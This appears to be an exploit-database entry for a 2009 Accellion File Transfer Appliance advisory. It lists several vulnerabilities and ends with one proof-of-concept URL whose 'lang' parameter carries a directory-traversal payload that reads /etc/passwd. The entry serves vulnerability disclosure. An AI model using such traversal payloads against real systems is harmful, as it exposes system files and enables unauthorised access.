Accellion File Transfer - 'Appliance web_client_user_guide.html?lang' Traversal Arbitrary File Access
Author: Tim Brown
type: remote
platform: linux
port:
date_added: 2010-02-10
date_updated: 2014-06-03
verified: 1
codes: CVE-2009-4645;OSVDB-62290
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/38176/info
Accellion File Transfer Appliance is prone to multiple remote vulnerabilities, including:
- Multiple privilege-escalation issues
- A directory-traversal issue
- An HTML-injection issue
- A remote command-injection issue
An attacker may leverage these issues to execute arbitrary script code within the context of the webserver, steal cookie-based authentication credentials, obtain sensitive information, and execute arbitrary code or commands with superuser privileges. Other attacks are also possible.
https://www.example.com/courier/1000@1276123d688676a09e0100b4f54b239c/web_client_user_guide.html?lang=../../../../../etc/passwd